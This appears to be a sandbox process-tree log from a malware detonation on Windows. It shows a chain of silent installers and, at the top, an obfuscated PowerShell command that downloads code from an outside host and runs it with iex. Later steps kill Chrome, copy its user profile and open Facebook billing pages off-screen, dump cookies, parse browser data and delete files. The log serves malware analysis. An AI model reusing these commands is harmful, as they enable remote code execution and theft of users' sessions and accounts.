cmd.exe /c start /B powershell -windowstyle hidden -command "&{$t='#i#ex##@(n#ew#####-#ob#jec#t N#et#.W#eb#Cl#ie#nt#).###########Up#loa#dSt##########ri#ng(#''h#t#tp#:#//labsclub.com/#w#el#co#me''#,#''Cr#ys#ta#lP#ig''#############)##|#ie##x'.replace('#','').split('@',5);&$t[0]$t[1]}"
8⤵
PID:5524

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -windowstyle hidden -command "&{$t='#i#ex##@(n#ew#####-#ob#jec#t N#et#.W#eb#Cl#ie#nt#).###########Up#loa#dSt##########ri#ng(#''h#t#tp#:#//labsclub.com/#w#el#co#me''#,#''Cr#ys#ta#lP#ig''#############)##|#ie##x'.replace('#','').split('@',5);&$t[0]$t[1]}"
9⤵
PID:8860

C:\Users\Admin\AppData\Local\Temp\22ivfx1jlsl\Setup3310.exe
"C:\Users\Admin\AppData\Local\Temp\22ivfx1jlsl\Setup3310.exe" /Verysilent /subid=577
5⤵
PID:3952

C:\Users\Admin\AppData\Local\Temp\is-S64MJ.tmp\Setup3310.tmp
"C:\Users\Admin\AppData\Local\Temp\is-S64MJ.tmp\Setup3310.tmp" /SL5="$4012A,802346,56832,C:\Users\Admin\AppData\Local\Temp\22ivfx1jlsl\Setup3310.exe" /Verysilent /subid=577
6⤵
PID:1992

C:\Users\Admin\AppData\Local\Temp\is-GJ648.tmp\Setup.exe
"C:\Users\Admin\AppData\Local\Temp\is-GJ648.tmp\Setup.exe" /Verysilent
7⤵
PID:7736

C:\Users\Admin\AppData\Local\Temp\is-BD7VQ.tmp\Setup.tmp
"C:\Users\Admin\AppData\Local\Temp\is-BD7VQ.tmp\Setup.tmp" /SL5="$2050C,802346,56832,C:\Users\Admin\AppData\Local\Temp\is-GJ648.tmp\Setup.exe" /Verysilent
8⤵
PID:7804

C:\Users\Admin\AppData\Local\Temp\is-M4JAR.tmp\ProPlugin.exe
"C:\Users\Admin\AppData\Local\Temp\is-M4JAR.tmp\ProPlugin.exe" /Verysilent
9⤵
PID:6256

C:\Users\Admin\AppData\Local\Temp\is-V6OPI.tmp\ProPlugin.tmp
"C:\Users\Admin\AppData\Local\Temp\is-V6OPI.tmp\ProPlugin.tmp" /SL5="$1068E,138429,56832,C:\Users\Admin\AppData\Local\Temp\is-M4JAR.tmp\ProPlugin.exe" /Verysilent
10⤵
PID:7532

C:\Users\Admin\AppData\Local\Temp\is-6N4JQ.tmp\Setup.exe
"C:\Users\Admin\AppData\Local\Temp\is-6N4JQ.tmp\Setup.exe"
11⤵
PID:5832

C:\Users\Admin\AppData\Local\Temp\RarSFX3\main.exe
"C:\Users\Admin\AppData\Local\Temp\RarSFX3\main.exe"
12⤵
PID:2980

C:\Windows\regedit.exe
regedit /s chrome.reg
13⤵
- Runs .reg file with regedit
PID:9140

C:\Windows\SYSTEM32\TASKKILL.exe
TASKKILL /F /IM chrome.exe
13⤵
- Kills process with taskkill
PID:9128

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c chrome64.bat
13⤵
PID:8520

C:\Windows\system32\mshta.exe
mshta vbscript:createobject("wscript.shell").run("chrome64.bat h",0)(window.close)
14⤵
PID:8312

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\RarSFX3\chrome64.bat" h"
15⤵
PID:7644

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:/Program Files/Google/Chrome/Application/chrome.exe"
16⤵
PID:2176

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=86.0.4240.111 --initial-client-data=0xd4,0xd8,0xdc,0x88,0xe0,0x7ff804ec6e00,0x7ff804ec6e10,0x7ff804ec6e20
17⤵
PID:6748

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1604,8227959174467420741,13553580495977678403,131072 --lang=en-US --service-sandbox-type=network --mojo-platform-channel-handle=1704 /prefetch:8
17⤵
PID:9832

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --field-trial-handle=1604,8227959174467420741,13553580495977678403,131072 --gpu-preferences=MAAAAAAAAADgAAAwAAAAAAAAAAAAAAAAAABgAAAAAAAQAAAAAAAAAAAAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAA= --mojo-platform-channel-handle=1640 /prefetch:2
17⤵
PID:9824

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=1604,8227959174467420741,13553580495977678403,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2332 /prefetch:8
17⤵
PID:10060

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1604,8227959174467420741,13553580495977678403,131072 --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=4 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=2816 /prefetch:1
17⤵
PID:10112

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1604,8227959174467420741,13553580495977678403,131072 --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=2776 /prefetch:1
17⤵
PID:10104

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1604,8227959174467420741,13553580495977678403,131072 --lang=en-US --extension-process --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=10 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3632 /prefetch:1
17⤵
PID:4012

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1604,8227959174467420741,13553580495977678403,131072 --lang=en-US --extension-process --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=9 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3500 /prefetch:1
17⤵
PID:7832

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1604,8227959174467420741,13553580495977678403,131072 --lang=en-US --extension-process --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3492 /prefetch:1
17⤵
PID:8156

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1604,8227959174467420741,13553580495977678403,131072 --lang=en-US --extension-process --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3352 /prefetch:1
17⤵
PID:2200

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1604,8227959174467420741,13553580495977678403,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=4432 /prefetch:8
17⤵
PID:9764

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1604,8227959174467420741,13553580495977678403,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=4296 /prefetch:8
17⤵
PID:9424

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1604,8227959174467420741,13553580495977678403,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=4472 /prefetch:8
17⤵
PID:5040

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1604,8227959174467420741,13553580495977678403,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=4432 /prefetch:8
17⤵
PID:9088

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1604,8227959174467420741,13553580495977678403,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5332 /prefetch:8
17⤵
PID:8632

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1604,8227959174467420741,13553580495977678403,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=5260 /prefetch:8
17⤵
PID:7060

C:\Program Files\Google\Chrome\Application\86.0.4240.111\Installer\chrmstp.exe
"C:\Program Files\Google\Chrome\Application\86.0.4240.111\Installer\chrmstp.exe" --configure-user-settings --verbose-logging --system-level --force-configure-user-settings
17⤵
PID:9848

C:\Program Files\Google\Chrome\Application\86.0.4240.111\Installer\chrmstp.exe
"C:\Program Files\Google\Chrome\Application\86.0.4240.111\Installer\chrmstp.exe" --type=crashpad-handler /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler --database=C:\Windows\TEMP\Crashpad --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=86.0.4240.111 --initial-client-data=0x23c,0x240,0x244,0x208,0x248,0x7ff61bc87740,0x7ff61bc87750,0x7ff61bc87760
18⤵
PID:9844

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1604,8227959174467420741,13553580495977678403,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=3872 /prefetch:8
17⤵
PID:3872

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1604,8227959174467420741,13553580495977678403,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=3512 /prefetch:8
17⤵
PID:9808

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1604,8227959174467420741,13553580495977678403,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=3540 /prefetch:8
17⤵
PID:7476

C:\Windows\regedit.exe
regedit /s chrome-set.reg
13⤵
- Runs .reg file with regedit
PID:8416

C:\Users\Admin\AppData\Local\Temp\RarSFX3\parse.exe
parse.exe -f json -b firefox
13⤵
PID:7888

C:\Users\Admin\AppData\Local\Temp\RarSFX3\parse.exe
parse.exe -f json -b chrome
13⤵
PID:6060

C:\Users\Admin\AppData\Local\Temp\RarSFX3\parse.exe
parse.exe -f json -b edge
13⤵
PID:4832

C:\Users\Admin\AppData\Local\Temp\is-M4JAR.tmp\PictureLAb.exe
"C:\Users\Admin\AppData\Local\Temp\is-M4JAR.tmp\PictureLAb.exe" /Verysilent
9⤵
PID:8660

C:\Users\Admin\AppData\Local\Temp\is-JBK5I.tmp\PictureLAb.tmp
"C:\Users\Admin\AppData\Local\Temp\is-JBK5I.tmp\PictureLAb.tmp" /SL5="$30670,1574549,56832,C:\Users\Admin\AppData\Local\Temp\is-M4JAR.tmp\PictureLAb.exe" /Verysilent
10⤵
PID:8796

C:\Users\Admin\AppData\Local\Temp\is-QNNNP.tmp\Setup.exe
"C:\Users\Admin\AppData\Local\Temp\is-QNNNP.tmp\Setup.exe" /VERYSILENT
11⤵
PID:1532

C:\Users\Admin\AppData\Local\Temp\is-NUSRG.tmp\Setup.tmp
"C:\Users\Admin\AppData\Local\Temp\is-NUSRG.tmp\Setup.tmp" /SL5="$2095E,442598,358912,C:\Users\Admin\AppData\Local\Temp\is-QNNNP.tmp\Setup.exe" /VERYSILENT
12⤵
PID:9164

C:\Users\Admin\AppData\Local\Temp\is-R2BKH.tmp\kkkk.exe
"C:\Users\Admin\AppData\Local\Temp\is-R2BKH.tmp\kkkk.exe" /S /UID=lab214
13⤵
PID:4660

C:\Program Files\VideoLAN\XNCLRWESZL\prolab.exe
"C:\Program Files\VideoLAN\XNCLRWESZL\prolab.exe" /VERYSILENT
14⤵
PID:9168

C:\Users\Admin\AppData\Local\Temp\is-00P53.tmp\prolab.tmp
"C:\Users\Admin\AppData\Local\Temp\is-00P53.tmp\prolab.tmp" /SL5="$506FC,575243,216576,C:\Program Files\VideoLAN\XNCLRWESZL\prolab.exe" /VERYSILENT
15⤵
PID:4516

C:\Users\Admin\AppData\Local\Temp\9f-deeeb-c46-fab8a-92e4225cb14be\Koloqopaera.exe
"C:\Users\Admin\AppData\Local\Temp\9f-deeeb-c46-fab8a-92e4225cb14be\Koloqopaera.exe"
14⤵
PID:2444

C:\Users\Admin\AppData\Local\Temp\is-M4JAR.tmp\Delta.exe
"C:\Users\Admin\AppData\Local\Temp\is-M4JAR.tmp\Delta.exe" /Verysilent
9⤵
PID:9724

C:\Users\Admin\AppData\Local\Temp\is-G3C3J.tmp\Delta.tmp
"C:\Users\Admin\AppData\Local\Temp\is-G3C3J.tmp\Delta.tmp" /SL5="$408D8,898740,56832,C:\Users\Admin\AppData\Local\Temp\is-M4JAR.tmp\Delta.exe" /Verysilent
10⤵
PID:10024

C:\Users\Admin\AppData\Local\Temp\is-TAQNH.tmp\Setup.exe
"C:\Users\Admin\AppData\Local\Temp\is-TAQNH.tmp\Setup.exe" /VERYSILENT
11⤵
PID:4832

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /c taskkill /im Setup.exe /f & timeout /t 6 & del /f /q "C:\Users\Admin\AppData\Local\Temp\is-TAQNH.tmp\Setup.exe" & del C:\ProgramData\*.dll & exit
12⤵
PID:7100

C:\Windows\SysWOW64\taskkill.exe
taskkill /im Setup.exe /f
13⤵
- Kills process with taskkill
PID:1612

C:\Windows\SysWOW64\timeout.exe
timeout /t 6
13⤵
- Delays execution with timeout.exe
PID:7748

C:\Users\Admin\AppData\Local\Temp\is-M4JAR.tmp\zznote.exe
"C:\Users\Admin\AppData\Local\Temp\is-M4JAR.tmp\zznote.exe" /Verysilent
9⤵
PID:8048

C:\Users\Admin\AppData\Local\Temp\is-LLGQG.tmp\zznote.tmp
"C:\Users\Admin\AppData\Local\Temp\is-LLGQG.tmp\zznote.tmp" /SL5="$3070E,138429,56832,C:\Users\Admin\AppData\Local\Temp\is-M4JAR.tmp\zznote.exe" /Verysilent
10⤵
PID:884

C:\Users\Admin\AppData\Local\Temp\is-8JANP.tmp\jg4_4jaa.exe
"C:\Users\Admin\AppData\Local\Temp\is-8JANP.tmp\jg4_4jaa.exe" /silent
11⤵
PID:7628

C:\Users\Admin\AppData\Local\Temp\is-M4JAR.tmp\hjjgaa.exe
"C:\Users\Admin\AppData\Local\Temp\is-M4JAR.tmp\hjjgaa.exe" /Verysilent
9⤵
PID:9696

C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
10⤵
PID:6576

C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
10⤵
PID:9656

C:\Users\Admin\AppData\Local\Temp\xoogtgy1cxx\vpn.exe
"C:\Users\Admin\AppData\Local\Temp\xoogtgy1cxx\vpn.exe" /silent /subid=482
5⤵
PID:5060

C:\Users\Admin\AppData\Local\Temp\is-J9VLE.tmp\vpn.tmp
"C:\Users\Admin\AppData\Local\Temp\is-J9VLE.tmp\vpn.tmp" /SL5="$104AA,15170975,270336,C:\Users\Admin\AppData\Local\Temp\xoogtgy1cxx\vpn.exe" /silent /subid=482
6⤵
PID:4312

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Program Files (x86)\MaskVPN\driver\win764\uninstall.bat" "
7⤵
PID:7932

C:\Program Files (x86)\MaskVPN\driver\win764\tapinstall.exe
tapinstall.exe remove tap0901
8⤵
PID:7784

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Program Files (x86)\MaskVPN\driver\win764\install.bat" "
7⤵
PID:284

C:\Program Files (x86)\MaskVPN\driver\win764\tapinstall.exe
tapinstall.exe install OemVista.inf tap0901
8⤵
PID:5548

C:\Program Files (x86)\MaskVPN\mask_svc.exe
"C:\Program Files (x86)\MaskVPN\mask_svc.exe" uninstall
7⤵
PID:10228

C:\Program Files (x86)\MaskVPN\mask_svc.exe
"C:\Program Files (x86)\MaskVPN\mask_svc.exe" install
7⤵
PID:9740

C:\Users\Admin\AppData\Local\Temp\ky0jijv3ciu\sxr0irvhkja.exe
"C:\Users\Admin\AppData\Local\Temp\ky0jijv3ciu\sxr0irvhkja.exe" /VERYSILENT
5⤵
PID:4728

C:\Users\Admin\AppData\Local\Temp\ndbap0orxkp\jpfels0a45a.exe
"C:\Users\Admin\AppData\Local\Temp\ndbap0orxkp\jpfels0a45a.exe" 57a764d042bf8
5⤵
PID:4416

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /k "C:\Program Files\LXH6GOF5OM\LXH6GOF5O.exe" 57a764d042bf8 & exit
6⤵
PID:7220

C:\Program Files\LXH6GOF5OM\LXH6GOF5O.exe
"C:\Program Files\LXH6GOF5OM\LXH6GOF5O.exe" 57a764d042bf8
7⤵
PID:7876

C:\Users\Admin\AppData\Local\Temp\grwzkdm14cn\chashepro3.exe
"C:\Users\Admin\AppData\Local\Temp\grwzkdm14cn\chashepro3.exe" /VERYSILENT
5⤵
PID:7052

C:\Users\Admin\AppData\Local\Temp\qnryrf2c2yz\1zmfbtq0wmm.exe
"C:\Users\Admin\AppData\Local\Temp\qnryrf2c2yz\1zmfbtq0wmm.exe" testparams
5⤵
PID:5496

C:\Users\Admin\AppData\Roaming\eji4bk4f5h5\4aeip4hwk3i.exe
"C:\Users\Admin\AppData\Roaming\eji4bk4f5h5\4aeip4hwk3i.exe" /VERYSILENT /p=testparams
6⤵
PID:7232

C:\Users\Admin\AppData\Local\Temp\is-2UES1.tmp\4aeip4hwk3i.tmp
"C:\Users\Admin\AppData\Local\Temp\is-2UES1.tmp\4aeip4hwk3i.tmp" /SL5="$203F0,413295,79360,C:\Users\Admin\AppData\Roaming\eji4bk4f5h5\4aeip4hwk3i.exe" /VERYSILENT /p=testparams
7⤵
PID:7304

C:\Users\Admin\AppData\Local\Temp\g1jsoslbfdo\askinstall24.exe
"C:\Users\Admin\AppData\Local\Temp\g1jsoslbfdo\askinstall24.exe"
5⤵
PID:1304

C:\Windows\SysWOW64\cmd.exe
cmd.exe /c taskkill /f /im chrome.exe
6⤵
PID:8520

C:\Windows\SysWOW64\taskkill.exe
taskkill /f /im chrome.exe
7⤵
- Kills process with taskkill
PID:6588

C:\Windows\SysWOW64\xcopy.exe
xcopy "C:\Users\Admin\AppData\Local\Google\Chrome\User Data" "C:\Users\Admin\AppData\Local\Temp\gcfgjfgjaa99\" /s /e /y
6⤵
PID:2096

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --window-position=-50000,-50000 --user-data-dir="C:\Users\Admin\AppData\Local\Temp\gcfgjfgjaa99" https://www.facebook.com/ https://www.facebook.com/pages/ https://secure.facebook.com/ads/manager/account_settings/account_billing/
6⤵
PID:6544

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler --user-data-dir=C:\Users\Admin\AppData\Local\Temp\gcfgjfgjaa99 /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler --database=C:\Users\Admin\AppData\Local\Temp\gcfgjfgjaa99\Crashpad --metrics-dir=C:\Users\Admin\AppData\Local\Temp\gcfgjfgjaa99 --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=86.0.4240.111 --initial-client-data=0xf0,0xf4,0xf8,0xec,0xc8,0x7ff804096e00,0x7ff804096e10,0x7ff804096e20
7⤵
PID:7960

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --field-trial-handle=1468,4661014900860279252,8806994388893812469,131072 --user-data-dir="C:\Users\Admin\AppData\Local\Temp\gcfgjfgjaa99" --gpu-preferences=MAAAAAAAAADgAAAwAAAAAAAAAAAAAAAAAABgAAAAAAAQAAAAAAAAAAAAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAA= --mojo-platform-channel-handle=1484 /prefetch:2
7⤵
PID:10136

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1468,4661014900860279252,8806994388893812469,131072 --lang=en-US --service-sandbox-type=network --user-data-dir="C:\Users\Admin\AppData\Local\Temp\gcfgjfgjaa99" --mojo-platform-channel-handle=1912 /prefetch:8
7⤵
PID:5888

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=1468,4661014900860279252,8806994388893812469,131072 --lang=en-US --service-sandbox-type=utility --user-data-dir="C:\Users\Admin\AppData\Local\Temp\gcfgjfgjaa99" --mojo-platform-channel-handle=2288 /prefetch:8
7⤵
PID:1512

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1468,4661014900860279252,8806994388893812469,131072 --lang=en-US --user-data-dir="C:\Users\Admin\AppData\Local\Temp\gcfgjfgjaa99" --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=2828 /prefetch:1
7⤵
PID:1232

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1468,4661014900860279252,8806994388893812469,131072 --lang=en-US --user-data-dir="C:\Users\Admin\AppData\Local\Temp\gcfgjfgjaa99" --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=2820 /prefetch:1
7⤵
PID:6860

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1468,4661014900860279252,8806994388893812469,131072 --lang=en-US --user-data-dir="C:\Users\Admin\AppData\Local\Temp\gcfgjfgjaa99" --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=9 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3204 /prefetch:1
7⤵
PID:7968

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1468,4661014900860279252,8806994388893812469,131072 --lang=en-US --user-data-dir="C:\Users\Admin\AppData\Local\Temp\gcfgjfgjaa99" --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3188 /prefetch:1
7⤵
PID:8300

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1468,4661014900860279252,8806994388893812469,131072 --lang=en-US --user-data-dir="C:\Users\Admin\AppData\Local\Temp\gcfgjfgjaa99" --extension-process --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=4 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3664 /prefetch:1
7⤵
PID:10284

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1468,4661014900860279252,8806994388893812469,131072 --lang=en-US --service-sandbox-type=utility --user-data-dir="C:\Users\Admin\AppData\Local\Temp\gcfgjfgjaa99" --mojo-platform-channel-handle=4512 /prefetch:8
7⤵
PID:10604

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1468,4661014900860279252,8806994388893812469,131072 --lang=en-US --service-sandbox-type=utility --user-data-dir="C:\Users\Admin\AppData\Local\Temp\gcfgjfgjaa99" --mojo-platform-channel-handle=4692 /prefetch:8
7⤵
PID:10632

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1468,4661014900860279252,8806994388893812469,131072 --lang=en-US --service-sandbox-type=utility --user-data-dir="C:\Users\Admin\AppData\Local\Temp\gcfgjfgjaa99" --mojo-platform-channel-handle=3856 /prefetch:8
7⤵
PID:10992

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1468,4661014900860279252,8806994388893812469,131072 --lang=en-US --service-sandbox-type=utility --user-data-dir="C:\Users\Admin\AppData\Local\Temp\gcfgjfgjaa99" --mojo-platform-channel-handle=4560 /prefetch:8
7⤵
PID:4820

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1468,4661014900860279252,8806994388893812469,131072 --lang=en-US --service-sandbox-type=utility --user-data-dir="C:\Users\Admin\AppData\Local\Temp\gcfgjfgjaa99" --mojo-platform-channel-handle=4564 /prefetch:8
7⤵
PID:6968

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1468,4661014900860279252,8806994388893812469,131072 --lang=en-US --service-sandbox-type=none --user-data-dir="C:\Users\Admin\AppData\Local\Temp\gcfgjfgjaa99" --mojo-platform-channel-handle=5064 /prefetch:8
7⤵
PID:8696

C:\Users\Admin\AppData\Local\Temp\jasqezh5ac1\vict.exe
"C:\Users\Admin\AppData\Local\Temp\jasqezh5ac1\vict.exe" /VERYSILENT /id=535
5⤵
PID:9080

C:\Users\Admin\AppData\Local\Temp\is-MJA6G.tmp\vict.tmp
"C:\Users\Admin\AppData\Local\Temp\is-MJA6G.tmp\vict.tmp" /SL5="$608D6,870426,780800,C:\Users\Admin\AppData\Local\Temp\jasqezh5ac1\vict.exe" /VERYSILENT /id=535
6⤵
PID:7460

C:\Users\Admin\AppData\Local\Temp\is-NCA1S.tmp\wimapi.exe
"C:\Users\Admin\AppData\Local\Temp\is-NCA1S.tmp\wimapi.exe" 535
7⤵
PID:1668

C:\Users\Admin\AppData\Local\Temp\atkcrjzu5mn\Setup3310.exe
"C:\Users\Admin\AppData\Local\Temp\atkcrjzu5mn\Setup3310.exe" /Verysilent /subid=577
5⤵
PID:8324

C:\Users\Admin\AppData\Local\Temp\is-H4E8H.tmp\Setup3310.tmp
"C:\Users\Admin\AppData\Local\Temp\is-H4E8H.tmp\Setup3310.tmp" /SL5="$D033C,802346,56832,C:\Users\Admin\AppData\Local\Temp\atkcrjzu5mn\Setup3310.exe" /Verysilent /subid=577
6⤵
PID:3872

C:\Users\Admin\AppData\Local\Temp\is-STERU.tmp\Setup.exe
"C:\Users\Admin\AppData\Local\Temp\is-STERU.tmp\Setup.exe" /Verysilent
7⤵
PID:1316

C:\Users\Admin\AppData\Local\Temp\is-3NUNG.tmp\Setup.tmp
"C:\Users\Admin\AppData\Local\Temp\is-3NUNG.tmp\Setup.tmp" /SL5="$90750,802346,56832,C:\Users\Admin\AppData\Local\Temp\is-STERU.tmp\Setup.exe" /Verysilent
8⤵
PID:9820

C:\Users\Admin\AppData\Local\Temp\is-U16M7.tmp\ProPlugin.exe
"C:\Users\Admin\AppData\Local\Temp\is-U16M7.tmp\ProPlugin.exe" /Verysilent
9⤵
PID:5156

